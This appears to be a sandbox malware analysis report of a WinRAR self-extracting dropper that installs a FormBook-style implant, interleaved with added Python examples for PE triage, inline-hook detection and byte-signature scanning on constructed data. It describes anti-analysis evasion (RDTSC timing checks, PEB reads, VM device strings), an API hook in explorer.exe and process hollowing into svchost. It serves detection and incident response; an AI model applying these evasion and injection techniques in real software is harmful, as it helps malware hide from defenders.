Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7139109
Source: classification engine Classification label: mal100.troj.evad.winEXE@10/4@2/2
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C66C74 GetLastError,FormatMessageW, 0_2_00C66C74
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_01
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C7A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_00C7A6C2
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Command line argument: sfxname 0_2_00C7DF1E
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Command line argument: sfxstime 0_2_00C7DF1E
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Command line argument: STARTDLG 0_2_00C7DF1E
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: primosdv3.1.1.0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: primosdv3.1.1.0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: primosdv3.1.1.0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: primosdv3.1.1.0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: primosdv3.1.1.0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: primosdv3.1.1.0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: primosdv3.1.1.0.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: primosdv3.1.1.0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: primosdv3.1.1.0.exe
Source: Binary string: wntdll.pdbUGP source: bstkiooen.exe, 00000001.00000003.255333801.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000001.00000003.253799569.0000000002B30000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: bstkiooen.exe, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp
Source: primosdv3.1.1.0.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: primosdv3.1.1.0.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: primosdv3.1.1.0.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: primosdv3.1.1.0.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: primosdv3.1.1.0.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C7F640 push ecx; ret 0_2_00C7F653
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C7EB78 push eax; ret 0_2_00C7EB96
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0169D0D1 push ecx; ret 2_2_0169D0E4
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_00417B13 push edi; retf 2_2_00417B14
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0041D4B5 push eax; ret 2_2_0041D508
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_00417D68 push edx; ret 2_2_00417D6A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0041D56C push eax; ret 2_2_0041D572
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0041D502 push eax; ret 2_2_0041D508
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0041D50B push eax; ret 2_2_0041D572
Source: primosdv3.1.1.0.exe Static PE information: section name: .didat
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7139109
Source: initial sample Static PE information: section name: .text entropy: 7.410591725114109
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe File created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe File created: C:\Users\user\AppData\Local\Temp\F61A.tmp
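The static findings above (the DllCharacteristics flags, which section each data directory lands in, the .didat section name and the .text entropy) are what a first-pass triage script reads out of the PE headers before any detonation. Two caveats when reading them: the flags and the sfxrar.pdb path describe the WinRAR self-extractor stub, not the FormBook payload it drops as bstkiooen.exe, so DYNAMIC_BASE/NX_COMPAT/GUARD_CF say nothing about the implant; and .didat is the MSVC linker's delay-load import data section, so it is expected in a WinRAR SFX even though the generic rule flags it as non-standard. The following is an added example, not Joe Sandbox code and not part of the report; it parses PE32/PE32+ headers with the standard library only and runs on a constructed image whose mitigation flags and directory placement mirror the report (the image, its section layout and section contents are made up).

```python
import math
import struct
from collections import Counter

# DllCharacteristics bits and data-directory order as defined in the PE/COFF specification.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
DATA_DIRECTORIES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC", "DEBUG",
    "ARCHITECTURE", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT", "IAT",
    "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 8.0 is uniform (packed/encrypted), plain code sits around 6, text 4-5."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def parse_pe(data: bytes) -> dict:
    """Extract mitigation flags, section entropies and data-directory placement from a PE image."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    _machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:            # PE32
        ndirs_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:          # PE32+ (8-byte ImageBase and stack/heap fields shift the tail)
        ndirs_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic %#x" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in PE32 and PE32+
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]
    dirs = [struct.unpack_from("<II", data, dirs_off + 8 * i) for i in range(ndirs)]

    sections = []
    sec_off = opt + opt_size
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, sec_off + 40 * i)
        raw = data[rawptr:rawptr + rawsize]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "va": va,
                         "vsize": max(vsize, rawsize), "entropy": shannon_entropy(raw)})

    def section_for(rva: int):
        for s in sections:
            if s["va"] <= rva < s["va"] + s["vsize"]:
                return s["name"]
        return None

    return {
        "dll_characteristics": [n for bit, n in sorted(DLL_CHARACTERISTICS.items()) if dll_chars & bit],
        "sections": sections,
        "directories": {DATA_DIRECTORIES[i]: section_for(rva)
                        for i, (rva, size) in enumerate(dirs) if size and i < len(DATA_DIRECTORIES)},
    }


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 image (not the analysed sample): two sections, the report's
    DllCharacteristics, IMPORT/DEBUG/IAT directories inside .rdata, a uniform-entropy .text."""
    text = bytes(range(256)) * 2                       # every byte value twice: entropy exactly 8.0
    rdata = b"constructed sample\0".ljust(0x200, b"\0")
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)              # PE32 magic
    struct.pack_into("<I", opt, 28, 0x400000)          # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)    # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x3000, 0x400)    # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 68, 2)                 # Subsystem: Windows GUI
    struct.pack_into("<H", opt, 70, 0x0040 | 0x0100 | 0x4000 | 0x8000)
    struct.pack_into("<I", opt, 92, 16)                # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * 1, 0x2000, 0x80)    # IMPORT -> .rdata
    struct.pack_into("<II", opt, 96 + 8 * 6, 0x2100, 0x1C)    # DEBUG  -> .rdata
    struct.pack_into("<II", opt, 96 + 8 * 12, 0x2180, 0x40)   # IAT    -> .rdata

    def sec(name, va, ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, 0x200, va, 0x200, ptr, 0, 0, 0, 0, chars)

    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt)
               + sec(b".text", 0x1000, 0x400, 0x60000020)
               + sec(b".rdata", 0x2000, 0x600, 0x40000040))
    return headers.ljust(0x400, b"\0") + text + rdata


if __name__ == "__main__":
    info = parse_pe(build_sample_pe())
    print(info["dll_characteristics"], info["directories"])
    for s in info["sections"]:
        print("%-8s entropy %.3f" % (s["name"], s["entropy"]))
```

Run it against a real file by replacing build_sample_pe() with open(path, "rb").read(); a .text entropy above roughly 7.2, as the report shows for the SFX stub, normally means compressed or encrypted content, which is expected for an archive stub but is the cue to look for the dropped payload rather than the wrapper.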

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE6
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\F61A.TMP
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
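The PeekMessageA finding above is a user-mode inline hook: the injected code overwrote the first bytes of a user32 export inside explorer.exe so that calls into the message pump pass through the implant first, which is how FormBook-style form grabbers and keyloggers see input without a kernel driver. The check a responder runs is to compare the prologue of every export as it exists in the DLL on disk with the bytes live in the process, then classify what was written. The following is an added example, not part of the Joe Sandbox report and not code from any named tool; it works on constructed byte strings. The only report-derived bytes are the six-byte 48 8B B8 87 7E E6 prefix for PeekMessageA; the clean prologues, virtual addresses and hook targets are assumed for illustration.

```python
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

PROLOGUE_LEN = 16   # bytes compared per export; long enough to hold every stub shape below


@dataclass
class HookFinding:
    function: str
    kind: str              # trampoline shape, or "unknown patch" when none is recognised
    target: Optional[int]  # where the trampoline transfers control, when decodable
    original: bytes
    current: bytes


def classify_stub(code: bytes, va: int) -> Tuple[str, Optional[int]]:
    """Recognise the trampolines user-mode hook engines usually write over a prologue."""
    if len(code) >= 5 and code[0] == 0xE9:                       # jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return "jmp rel32", (va + 5 + rel) & 0xFFFFFFFFFFFFFFFF
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:   # push imm32 ; ret
        return "push imm32; ret", struct.unpack_from("<I", code, 1)[0]
    if len(code) >= 6 and code[:2] == b"\xFF\x25":               # jmp [mem]
        disp = struct.unpack_from("<I", code, 2)[0]               # absolute on x86, RIP-relative on x64
        return "jmp [mem]", disp
    if len(code) >= 12 and code[:2] == b"\x48\xB8" and code[10:12] == b"\xFF\xE0":
        return "mov rax, imm64; jmp rax", struct.unpack_from("<Q", code, 2)[0]
    return "unknown patch", None


def find_inline_hooks(disk: Dict[str, bytes], memory: Dict[str, bytes],
                      addresses: Dict[str, int]) -> List[HookFinding]:
    """Report every export whose live prologue differs from the on-disk copy."""
    findings = []
    for name, va in addresses.items():
        on_disk, live = disk[name][:PROLOGUE_LEN], memory[name][:PROLOGUE_LEN]
        if on_disk != live:
            kind, target = classify_stub(live, va)
            findings.append(HookFinding(name, kind, target, on_disk, live))
    return findings


# --- constructed sample data (assumed prologues and addresses, not captured from the analysed host) ---
X86_PROLOGUE = bytes.fromhex("8BFF558BEC83EC105356578B7D0885FF")   # mov edi,edi; push ebp; mov ebp,esp ...
X64_PROLOGUE = bytes.fromhex("48895C24084889742410574883EC2048")   # mov [rsp+8],rbx; mov [rsp+10h],rsi ...
SAMPLE_ADDRESSES = {
    "PeekMessageA": 0x7FFB1A2C5F10,      # assumed x64 VA
    "GetMessageW": 0x75A12340,           # assumed x86 VAs
    "TranslateMessage": 0x75A13000,
    "SendMessageW": 0x75A14200,
}
SAMPLE_DISK = {
    "PeekMessageA": X64_PROLOGUE,
    "GetMessageW": X86_PROLOGUE,
    "TranslateMessage": X86_PROLOGUE,
    "SendMessageW": X86_PROLOGUE,
}
HOOK_TARGET_JMP = 0x00A51000             # assumed implant addresses
HOOK_TARGET_PUSH = 0x00A52000
SAMPLE_MEMORY = {
    # first six bytes as the report lists for explorer.exe!user32.PeekMessageA; remainder assumed unchanged
    "PeekMessageA": bytes.fromhex("488BB8877EE6") + X64_PROLOGUE[6:],
    "GetMessageW": b"\xE9" + struct.pack("<i", HOOK_TARGET_JMP - (SAMPLE_ADDRESSES["GetMessageW"] + 5))
                   + X86_PROLOGUE[5:],
    "TranslateMessage": b"\x68" + struct.pack("<I", HOOK_TARGET_PUSH) + b"\xC3" + X86_PROLOGUE[6:],
    "SendMessageW": X86_PROLOGUE,        # untouched export, must not be reported
}


def run_sample() -> List[HookFinding]:
    return find_inline_hooks(SAMPLE_DISK, SAMPLE_MEMORY, SAMPLE_ADDRESSES)


if __name__ == "__main__":
    for f in run_sample():
        print("%-18s %-24s target=%s live=%s" % (f.function, f.kind,
              hex(f.target) if f.target is not None else "-", f.current[:8].hex()))
```

On a live system the two byte maps come from mapping the DLL from disk (SEC_IMAGE) and reading the same export RVAs out of the target with ReadProcessMemory; relocated absolute operands must be fixed up or masked before the comparison, otherwise every relocated function in a non-rebased DLL shows as patched. A prologue that differs but matches none of the known shapes, as the reported PeekMessageA bytes do here, still deserves a look: hook engines that copy a longer stub or patch past the first instruction produce exactly that.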

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000002D79904 second address: 0000000002D7990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000002D79B7E second address: 0000000002D79B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
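The four RDTSC findings above are one idiom seen at two sites in bstkiooen.exe and again at the same offsets in the hollowed svchost.exe: read the time-stamp counter, clear a register, accumulate the low half of the first reading, read again. The difference between the two readings is a handful of cycles on bare metal and far larger under single-stepping, emulation or a hypervisor that traps RDTSC, which is what the "instruction interceptor" in the sandbox exists to hide. The mov eax, fs:[00000030h] findings further down are the PEB pointer reads that feed the complementary checks (BeingDebugged, NtGlobalFlag), though the same read also starts the PEB_LDR_DATA walk that position-independent payloads use to resolve APIs by hash, so a PEB read on its own is not evidence of anti-debugging. The following is an added example, not part of the Joe Sandbox report; it is a byte-signature scanner for both idioms that runs on a constructed code buffer. The report prints disassembly, not bytes, so the encodings (0F 31 for rdtsc, 64 A1 / 64 8B /r with a 30h displacement for the PEB read) are the standard Intel encodings inferred from it, and the matcher accepts both xor/add encodings a compiler or hand-assembler may emit.

```python
import re
from dataclasses import dataclass
from typing import List

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Byte signatures (standard x86 encodings, inferred from the report's disassembly):
#   rdtsc_delta : 0F 31 (rdtsc) .. 1-6 bytes of bookkeeping .. 0F 31 (rdtsc)
#   peb_read    : 64 A1 30 00 00 00        mov eax, fs:[30h]   (short moffs form)
#                 64 8B /r 30 00 00 00     mov r32, fs:[30h]   (ModRM mod=00 rm=101 -> disp32)
SIGNATURES = {
    "rdtsc_delta": re.compile(rb"\x0F\x31.{1,6}?\x0F\x31", re.DOTALL),
    "peb_read": re.compile(rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00"),
}


@dataclass
class Finding:
    signature: str
    va: int
    detail: str   # destination register for PEB reads, gap length for rdtsc pairs
    raw: bytes


def describe(name: str, raw: bytes) -> str:
    if name == "peb_read":
        return "eax" if raw[1] == 0xA1 else REG32[(raw[2] >> 3) & 7]
    return "gap=%d" % (len(raw) - 4)


def scan(code: bytes, base: int = 0) -> List[Finding]:
    """Scan a code section (or a memory dump) and return hits with their virtual addresses."""
    out = []
    for name, pat in SIGNATURES.items():
        for m in pat.finditer(code):
            out.append(Finding(name, base + m.start(), describe(name, m.group()), m.group()))
    return sorted(out, key=lambda f: f.va)


# --- constructed sample buffer (not the real .text of bstkiooen.exe) ---
NOPS = b"\x90" * 16
SAMPLE_CODE = (
    NOPS
    + bytes.fromhex("0F3133C903C80F31")   # rdtsc; xor ecx,ecx; add ecx,eax; rdtsc  (as reported)
    + NOPS
    + bytes.fromhex("64A130000000")       # mov eax, fs:[30h]
    + NOPS
    + bytes.fromhex("648B0D30000000")     # mov ecx, fs:[30h]
    + NOPS
    + bytes.fromhex("0F3131C901C10F31")   # same idiom with the alternate xor/add encodings
    + NOPS
    + bytes.fromhex("0F31")               # lone rdtsc: a single read is not a timing check
    + NOPS
    + bytes.fromhex("64A118000000")       # mov eax, fs:[18h] (TEB self pointer): not a PEB read
    + NOPS
)
SAMPLE_BASE = 0x409904 - len(NOPS)        # puts the first pair at the VA the report gives for bstkiooen.exe


if __name__ == "__main__":
    for f in scan(SAMPLE_CODE, SAMPLE_BASE):
        print("%-12s %08X %-6s %s" % (f.signature, f.va, f.detail, f.raw.hex()))
```

Two rdtsc within eight bytes is rare in compiler output, so rdtsc_delta is a low-noise rule; peb_read fires on every PEB access, including legitimate CRT and loader code, so in practice it is weighted by where it occurs (unmapped or RWX memory, a hollowed process) rather than used on its own. Hand-written YARA rules for the same idioms would be the two regexes above as hex strings with wildcards for the bookkeeping bytes.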
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F61A.tmp
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01686DE6 rdtsc 2_2_01686DE6
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe API coverage: 9.3 %
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C7E6A3 VirtualQuery,GetSystemInfo, 0_2_00C7E6A3
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C6A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_00C6A69B
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C7C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_00C7C220
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C8B348 FindFirstFileExA, 0_2_00C8B348
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000003.00000000.308116481.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: explorer.exe, 00000003.00000000.304900101.0000000007166000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000003.00000000.308116481.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.308116481.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000003.00000000.334006724.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000003.00000000.299904671.0000000005063000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: explorer.exe, 00000003.00000000.334006724.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000003.00000000.284751375.000000000F62F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft Sto
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C7F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00C7F838
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C8C030 GetProcessHeap, 0_2_00C8C030
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01686DE6 rdtsc 2_2_01686DE6
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C87DEE mov eax, dword ptr fs:[00000030h] 0_2_00C87DEE
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 1_2_00BD007A mov eax, dword ptr fs:[00000030h] 1_2_00BD007A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 1_2_00BD0019 mov eax, dword ptr fs:[00000030h] 1_2_00BD0019
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 1_2_00BD0149 mov eax, dword ptr fs:[00000030h] 1_2_00BD0149
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 1_2_00BD0005 mov eax, dword ptr fs:[00000030h] 1_2_00BD0005
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164C962 mov eax, dword ptr fs:[00000030h] 2_2_0164C962
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0166C577 mov eax, dword ptr fs:[00000030h] 2_2_0166C577
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0166C577 mov eax, dword ptr fs:[00000030h] 2_2_0166C577
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164B171 mov eax, dword ptr fs:[00000030h] 2_2_0164B171
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164B171 mov eax, dword ptr fs:[00000030h] 2_2_0164B171
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0166B944 mov eax, dword ptr fs:[00000030h] 2_2_0166B944
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0166B944 mov eax, dword ptr fs:[00000030h] 2_2_0166B944
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01683D43 mov eax, dword ptr fs:[00000030h] 2_2_01683D43
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C3540 mov eax, dword ptr fs:[00000030h] 2_2_016C3540
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01667D50 mov eax, dword ptr fs:[00000030h] 2_2_01667D50
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01718D34 mov eax, dword ptr fs:[00000030h] 2_2_01718D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01664120 mov eax, dword ptr fs:[00000030h] 2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01664120 mov eax, dword ptr fs:[00000030h] 2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01664120 mov eax, dword ptr fs:[00000030h] 2_2_01664120
